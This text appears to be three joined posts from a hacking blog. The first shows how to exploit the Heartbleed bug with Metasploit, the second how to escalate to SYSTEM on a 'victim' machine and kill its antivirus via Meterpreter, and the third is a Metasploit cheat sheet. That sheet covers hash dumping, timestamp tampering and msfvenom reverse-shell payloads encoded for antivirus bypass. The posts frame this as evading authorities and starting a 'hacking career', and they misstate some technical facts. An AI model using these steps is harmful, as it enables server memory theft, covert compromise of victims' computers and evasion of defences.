What is Heartbleed Bug

On April 7, 2014, OpenSSL received a fix to a very popular and controversial vulnerability The Heartbleed bug. On that day, over half a million web servers were found to be vulnerable. Fortunately, that number is steadily decreasing and just like every other exploit, the Heartbleed bug is now out in the wild and the epidemic may never be fully eliminated (A hacker can dream, right?)

This vulnerability allows a hacker to extract information from a server’s memory which may contain authentication credentials, cookies, the server’s private key (even the admin password), and personally identifiable info (PII) that could be used for identity theft. The biggest websites on the internet were vulnerable. Facebook, Google, Twitter, Instagram, Yahoo, Pinterest, Tumblr, Dropbox and a few million more. All these websites were quick to announce, within a few weeks, that they’ve successfully patched the bug. What they didn’t announce, is that this vulnerability existed even 2 years ago and only now came to light. This is also part of the reason users were recommended to change all passwords everywhere. The NSA has (allegedly) been using this vulnerability for years to exploit websites.

Also Read: XSS Attack

OpenSSL is an encryption library used in HTTPS (secure HTTP)

If you ever notice URL bar after typing the address, say “google.com” you’ll see that it automatically changes to “https://www.google.com”. That is the job of OpenSSL. OpenSSL basically encrypts all communication between the server and the client while it takes place through the HTTPS URL. This makes all the password sniffing cookie stealing hacks impossible (sad face).

OpenSSL uses a handshake, or more popularly, a “heartbeat” that echoes back a signal to verify that the data was received correctly, during communication. It’s a bit like double checking whether the message was successfully received or not (Like the two tick marks you can see on WhatsApp messages).

Also Read: Latest Carding Dorks 2017

What is Heartbleed Bug?

The appropriately named Heartbleed bug vulnerability enables a hacker to trick OpenSSL by sending a message that is misinterpreted by the server running OpenSSL. Which then actually sends back the real data without any questions asked. The exact details are a bit technical. But thanks to Metasploit we don’t need to worry about them. Roughly translated, a single byte of data is sent to the server telling it that we actually sent 64K bytes of data. The server will then send back 64K bytes of data to be checked and echoed back.

After this ‘heartbeat’, the server again sends 64K of random data from its memory. That 1 byte has the buggy requests which confuses the server making it give up random information. So, with every ‘heartbeat’ we get 64Kb of private information (That’s enough for ~64,000 characters in plain unencrypted text. A lot of it will be rubbish but still enough for A LOT of accounts and passwords)

Also Read: Metasploit Tools And Cheat Sheet

Now for the Exploit

Here you’ll learn to exploit the Heartbleed bug for getting a buggy website’s OpenSSL to spill the contents of its memory and possibly give us the user’s credentials and other information:

Step 1: This should be the good time to update Metasploit to get the new auxiliary module for Heartbleed. (Unless you downloaded Metasploit after the exploit was released).

Type: kali > msfupdate
Metasploit will then go through the long and slow process of checking and updating its modules and framework. The update has completed and we’re ready to begin, by returning to the command prompt.

Step 2: Start Metasploit
kali > msfconsole

Step 3: Find Heartbleed using the built-in search feature.

Type: search heartbleed
This should bring up two auxiliary modules for Heartbleed. We want the one under ‘scanner’ folder and not ‘server’.

Step 4: Load up the auxiliary module
use auxiliary/scanner/ssl/openssl_heartbleed
This will load the heartbleed module.

Whenever using a new module, you may wish to find more about it and the options we can set for it.
msf > info
This command reveals the options that we can set to use this module and a description of the module.

Step 5: Set RHOSTS. RHOSTS refers to the website that is vulnerable to the Heartbleed bug. We can set it to the IP address of the website as shown below (To find the IP address of a website, simply ping it through the command line (e.g : ping www.google.com) :
msf > set RHOSTS
msf > set verbose true

Finally, set the option “verbose” to “true”. This will give us verbose output (i.e., everything that Metasploit receives from the server will be shown to us).

Step 6: Let her rip.
msf > run

If everything went as planned the server will leak about 64K bytes of what was in its memory. This could contain anything from username-password pairs to credit card numbers which is why this hack (along with pretty much all others) is very much illegal to actually try on a live website without the developer’s explicit consent.

Here is an interesting page listing the names of thousands of vulnerable websites: https://zmap.io/heartbleed/

Also Read: Disable Antivirus In Remote PC

Note:– This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope HACKAGON have provided a healthy knowledge about Heartbleed Bug. So, stay secure and keep learning. If you like this article then don’t forget to share it with your friends and always feel free to drop a comment below, if you have any query or feedback.

Anonymity is a very big issue for a Hacker to save his ass from the Authority/Victim. If a hacker can somehow get in a system under the antivirus’s nose it is very likely that S/he will get caught if the antivirus scans the system for malicious files and connections. Protecting oneself is more important than exploiting the victim. So Let’s learn to Disable Antivirus In Remote PC.

As Installing Antivirus Software on the computer is an excellent way to deter Hackers, Conversely, Disabling Antivirus Software is an excellent way to exploit a system without leaving any Footprint.

Disable Antivirus In Remote PC

Why To Disable Antivirus In Remote PC ??

Disabling Antivirus and Firewall in victim’s PC are the necessary tasks for any Hacker to take care of because the next time the system is scanned by the victim’s antivirus software, it’s likely to detect our listener and disable it, so we need to take preemptive action to disable it before it can disable us.

Logic Behind Disabling Antivirus

Antivirus Software’s are designed in the way that nobody can shut it down by simply closing it from the tray icon or by it’s GUI. If you have an antivirus on your computer, try to close it from the tray icon or the GUI. You’ll see that it asks you to confirm your action. Now open up task manager and try to kill the antivirus process file (something like avg.exe), you’ll find that now no questions are asked and the antivirus process is killed instantly. That’s because the admin has more control over the system than the antivirus, which is exactly what we’ll use to carry out this hack.

How To Disable Antivirus In Remote PC ??

Meterpreter is the utility which gives us complete control over the system. We can send commands to install a keylogger, jump to other computers on the network, look through all the files and directories, start and close programs at our will and tons more. Here, we’ll focus on the commands to Disable Antivirus Protection.

Steps To Disable Antivirus In Remote PC

Step 1# Getting Started: First of all, we need to escalate our privileges. Usually, when we hook up a listener (Meterpreter) on the victim’s system, the listener have the same privileges as the user. Nowadays, By default, all the latest operating system’s are giving reduced privileges to the user to make sure that the user cannot tamper with important files/folders (like system32) and to add another layer of protection from Hackers. To carry out this hack we need admin (or sysadmin) privileges.

Meterpreter listener embedded

Remember! Writing this tutorial we assumed that you’ve already embedded a Meterpreter Listener on the victim’s computer.

Step 2# Get the user ID: Before attempting to increase our privileges, let’s check to see if we’re already the admin. so that we can get straight to the Hack.

Type: meterpreter > getuid

Now this should return the ID of the user currently logged in. Depending on the OS this statement gives different results but we’re looking for are the keywords like “admin”, “sysadmin”, “authority”, “system”. These are bound to be associated with an account with admin privileges. Chances are that we’ll get something else not similar to this so, in the next step, we’ll take care of that.

Step 3# Escalate Privileges: Metasploit and its Meterpreter make it simple to escalate privileges to the sysadmin.

Type: meterpreter > getsystem

Escalate Privileges

You’ll notice that Metasploit responds with something like “…got system (with technique 1)” if everything went as planned. There are multiple inbuilt functions that Metasploit uses to try to increase privileges when ‘getsystem’ command is sent. It simply tries out all of them to see which one works.

Step 4# Check That Are we Sysadmin: Now that Metasploit has told us that it has escalated our privileges to sysadmin, let’s make sure.

Type: meterpreter > getuid

Check That Are we Sysadmin

One of the most common returns to the getuid after this command is Server username: NT Authority\System and this is what we’re looking for ideally. But if you get any of the above keywords, that’s just fine as well.

Step 5# Kill The Antivirus: Now as we have the power of admin. Let’s kill the antivirus of the victim. And For that purpose, Metasploit has a Ruby script called killav.rb which looks for any antivirus process that is running to shuts them down. It works on almost all of the antiviruses so we can be reasonably sure that it’ll do the job. (If it doesn’t, we could alternatively look for running processes and try to kill them manually).

Type: meterpreter > run killav.rb

Kill The Antivirus

You should see an output like “Killing Antivirus…”

Killing Antivirus

We’re Done. . .The antivirus is taken care of and can no longer interfere with our further activities. Ideally, you want to make sure that you’re hidden before trying out any hacks.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that our readers will maintain their anonymity and stay safe. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

Metasploit is an open source computer security project. Metasploit is not a single tool but a framework which is used for developing and executing exploit code against the Remote Target. Using Metasploit we can exploit most of the vulnerabilities that exist in a software and that is the only reason that makes us point out the Metasploit Tools And Cheat Sheet for the HACKAGON‘s readers.

Metasploit Tools And Cheat Sheet

The purpose of this Metasploit Tools And Cheat Sheet is to describe some common options for some of the various components of the Metasploit Framework.

Tools Described

Metasploit: The Metasploit Framework is a development platform for developing and using security tools and exploits.

Metasploit Meterpreter: The Meterpreter is a payload within the Metasploit Framework that provides control over an exploited target system, running as a DLL loaded inside of any process on a target machine.

Metasploit msfvenom: The msfvenom tool is a component of the Metasploit Framework that allows users to generate a standalone version of any payload within the framework. Payloads can be generated in a variety of formats including executable, Ruby script, and raw shellcode. The msfvenom tool can also encode payloads to help avoid detection.

Meterpreter Post Modules

With an available Meterpreter session, post modules can be run on the target machine.

Post Modules from Meterpreter
meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS
msf > run

DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server
msf > use auxiliary/server/socks4
msf > run

Any proxied traffic that matches the subnet of a route will be routed through the session specified by route and use proxychains configured for socks4 to route any application’s traffic through a Meterpreter session.

Metasploit Console Basics (msfconsole)

Search for module
msf > search [regex]

Specify and exploit to use
msf > use exploit/[ExploitPath]

Specify a Payload to use
msf > set PAYLOAD [PayloadPath]

Show options for the current modules
msf > show options

Set options
msf > set [Option] [Value]

Start exploit
msf > exploit

Metasploit Meterpreter

Base Commands

? / help: Displays a summary of commands.
exit / quit: Exit the Meterpreter session.
sysinfo: Shows the system name and OS type.
shutdown / reboot: Self-explanatory.

File System Commands

cd: Changes the directory.
lcd: Changes directory on local (attacker’s) machine.
pwd / getwd: Displays current working directory.
ls: Shows the contents (List) of the directory.
cat: Displays the contents of a file on the screen.
download / upload: Move files to/from the target machine.
mkdir / rmdir: Make / remove directory.
edit: Open a file in the default editor (typically vi).

Process Commands

getpid: Displays the process ID that Meterpreter is running inside.
getuid: Displays the user ID that Meterpreter is running with.
ps: Displays process list.
kill: Terminates a process given its process ID.
execute: Runs a given program with the privileges of the process, the Meterpreter is loaded in.
migrate: Jump to a given destination process ID.
                – Target process must have same or lesser privileges.
                – Target process may be a more stable process.
                – When inside a process, can access any files that the process has a lock on.

Network Commands

ipconfig: Shows network interface information.
portfwd: Forward packets through TCP session.
route: Manage/view the system’s routing table.

Misc Commands

idletime: Displays the duration that the GUI of the target machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enables/disables either the mouse or keyboard of the target machine.
screenshot: Saves the screenshot of the target machine.

Additional Modules

use [module]: Loads the specified module.

use priv: Loads the previous module.
hashdump: Dump the hashes from the box.
timestomp: Alter NTFS file timestamps.

Metasploit msfvenom

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Runs with ‘‘-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse connection)]

Example Reverse Meterpreter payload as an executable and redirected to a file:

$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=
LPORT=4444 > met.exe

Format Options (specified with –f)

–help-formats: List available output formats
exe: Executable
pl: Perl
rb: Ruby
raw: Raw shellcode
c: C code

Encoding Payloads with msfvenom: The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse connection.)]

Example: Encode a payload from msfpayload 5 times using shikata_ga_nai encoder and output as executable

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST= LPORT=4444 > mal.exe

Managing Sessions

Multiple Exploitation

Run the exploit expecting a single session that is immediately backgrounded
msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded
msf > exploit –j

List all current jobs (usually exploit listeners)
msf > jobs –l

Kill a job
msf > jobs –k [JobID]

Multiple Sessions

List all backgrounded sessions
msf > sessions -l

Interact with a backgrounded session:
msf > session -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z> (OR meterpreter > background)

Routing Through Sessions

All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, we hope that we provided some useful knowledge about Metasploit & it’s Tools used for Hacking so that readers can begin their Hacking career with an ease. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.